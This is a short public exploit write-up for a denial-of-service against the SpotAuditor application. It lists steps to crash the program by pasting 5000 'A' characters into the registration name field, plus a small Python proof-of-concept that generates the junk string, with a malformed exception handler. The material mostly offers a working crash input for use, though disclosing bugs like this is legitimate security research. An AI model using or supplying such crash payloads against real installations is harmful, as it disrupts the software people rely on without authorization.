# Exploit Title: SpotAuditor - Denial of Service # Author: Sanjana Shetty # Date: 2019-10-13 # Version: SpotAuditor # Vendor Homepage: http://www.nsauditor.com # Software link: http://spotauditor.nsauditor.com/ # # Steps [1] Install the SpotAuditor software [2] Access the register functionality [3] In the name field enter 5000 A's and press enter, this will crash the application. ==== use below script to create 5000 A's to a text file and copy it to the name field============ print ("# POC by sanjana shetty") try: f = open("file.txt","w") junk = "\x41" * 5000 f.write(junk) print ("done") except (Exception, e): print ("#error - ") + str(e)